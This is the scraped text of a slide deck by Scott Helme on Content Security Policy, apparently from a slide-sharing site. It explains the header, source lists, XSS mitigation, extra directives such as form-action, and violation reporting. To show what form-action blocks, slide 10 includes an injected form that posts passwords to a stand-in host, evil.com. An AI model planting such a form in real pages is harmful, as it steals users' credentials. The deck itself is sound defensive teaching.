Recomendados
Mais conteúdo relacionado
Mais procurados
Mais procurados (20)
Destaque
Destaque (15)
Semelhante a Content Security Policy - The application security Swiss Army Knife
Semelhante a Content Security Policy - The application security Swiss Army Knife (20)
Último
Último (20)
Content Security Policy - The application security Swiss Army Knife
- 1. Content Security Policy The application security Swiss Army Knife @Scott_Helme | scotthelme.co.uk Scott Helme
- 3. What is CSP? cache-control: max-age=0, no-cache content-encoding: gzip content-security-policy: [policy goes here] date: Fri, 22 Apr 2016 10:00:00 GMT server: nginx status: 200
- 5. A basic policy Content-Security-Policy: default-src ‘self’ mycdn.com
- 6. Fine tuning Content-Security-Policy: default-src ‘self’; script-src ‘self’ cdnjs.cloudflare.com ajax.googleapis.com <script src="https://ajax.googleapis.com/.../jquery.min.js"> </script> <script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js"> </script>
- 7. Fine tuning Content-Security-Policy: default-src ‘self’; script-src [source list]; style-src [source list]; img-src [source list]; child-src [source list];
- 8. Mitigating XSS <script> var message = “Hello World!!!”; alert(message); </script> <script src=“(scotthelme.co.uk)/js/message.js”> </script>
- 10. form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests <form action=“https://evil.com/stealPassword.php” method=“post”> ... </form>
- 11. form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests <iframe src=“https://scotthelme.co.uk/”> </iframe>
- 12. form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests <img src=“http://imgur.com/kittens.png/”>
- 14. CSP Reporting Content-Security-Policy-Report-Only: [policy]; report-uri https://scotthelme.report-uri.io { "csp-report": { "document-uri": "https://scotthelme.co.uk/ecdsa/", "violated-directive": “script-src ‘self’", "original-policy": “[policy here]", "blocked-uri": https://evil.com ...
- 15. Migrating from HTTP to HTTPS Content-Security-Policy-Report-Only: default-src https:; report-uri https://scotthelme.report-uri.io